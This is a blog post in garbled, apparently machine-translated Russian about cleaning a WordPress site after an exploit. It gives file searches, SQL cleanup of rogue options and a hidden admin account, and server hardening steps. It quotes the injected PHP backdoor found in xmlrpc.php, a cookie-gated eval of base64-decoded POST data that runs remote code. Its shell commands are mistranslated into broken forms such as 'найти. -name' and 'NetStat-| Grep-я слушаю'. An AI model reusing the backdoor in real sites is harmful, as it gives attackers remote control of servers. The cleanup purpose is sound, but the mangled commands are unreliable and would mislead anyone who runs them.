Прежде, чем Вы читаете это сообщение, вы должны увидеть разместить здесь, Чтобы что-то понять. :)
Я нашел его в нескольких файлах блога на stealthsettings.com, коды, подобные приведенным ниже, которые появились в результате заражения вирусом подвиг WordPress.:
si
<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>
Если она выше файл xmlrpc.php от СонныйНо в GREP сервер, вы можете видеть, что есть довольно много такого рода в исходном коде.

Лечение зараженных файлов:
Ooookkkk ...
1. Лучшее решение, после того, как было резервная копияИ очищать базу данных, чтобы вытирать Файлы WordPress (вы можете сохранить wp-config.php и файлы, которые не имеют прямого отношения к платформе wp, после их тщательной проверки) с сервера и загрузить оригинальные из версии 2.5.1 (В течение этого сделать WP обновления версии :)) http://wordpress.org/download/ . Протрите включая файлы темы, если вы не уверены, что их тщательной проверки.
Кажется, были затронуты и файлы темы, которые не были использованы, прежде чем на блоге и просто меняя тему, не решает проблемы.
./андреа/wp-контент/темы/default/index.php:
2. Поиск и удаление всех файлов, содержащих: * _new.php, _old.php *, * Jpgg, Giff *, * Pngg и файл WP-info.txt, если таковые имеются....
найти. -name «* _new.php»
найти. -name «* _old.php»
найти. -name «* .jpgg»
найти. -name «* _giff»
найти. -name «* _pngg»
найти. -name «wp-info.txt»
3. в / Tmp , Поиск и удаление папок, как tmpYwbzT2
SQL очистки :
1. В таблице Таблица wp_options Смотрите, если есть удалите строки: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.
2. Все в wp_options, идти к active_plugins и удалять, если есть плагин, который заканчивается в одном из расширений * _new.php, _old.php *, *. jpgg, *. Гифф, *. pngg или если другое расширение подозреваемых, тщательно проверить.
3. В Таблице wp_users, Смотрите, если есть пользователь, который ничего не написал в своем праве, колонка user_nicename. Удалите этого пользователя, но запомните номер в столбце ID. Этот пользователь, скорее всего, будет использовать "WordPress”Ка user_login и, кажется, созданных на 00: 00: 00 0000-00-00.
4. Перейти к таблице wp_usermeta и удалить все линии, принадлежащие ID выше.
После того, как вы выполнили эту очистку sql, отключите, а затем активируйте любой плагин. (в блоге -> Личный кабинет -> Плагины)
Безопасный сервер:
1. Посмотрите, что каталоги и файлы "записи»(chmod 777) и попробуйте поставить chmod что больше не позволит их писать на любом уровне. (chmod 644, например)
Найти. -Пермь-2-LS
2. Посмотрите, что файлы имеют бит SUID или SGID . Если вы не используете эти файлы положить на них chmod 0 или удалить пакет, который она содержит. Очень опасны, потому что они выполняют привилегии "группы"Или"корень"И не с нормальными пользовательскими привилегиями для выполнения этого файла.
Найти / типа F-Пермь-04000-LS
Найти / типа F-Пермь-02000-LS
3. Проверьте, какие порты открыты и попытаться закрыть или защитить тех, которые не используются.
NetStat-| Grep-я слушаю
О его. Понимаю Некоторые блоги запрещены de Google Search а другие говорят: "Он сделал их хорошо!!!" . Ну, я бы сделал это за них... но что вы скажете, если Google начнет банить Все сайты формирование Является спамом и положить трояны (Trojan.Clicker.HTML) в куки?
1 мысль о "WordPress Эксплойт — Очистить вирусные файлы, SQL и безопасность сервера».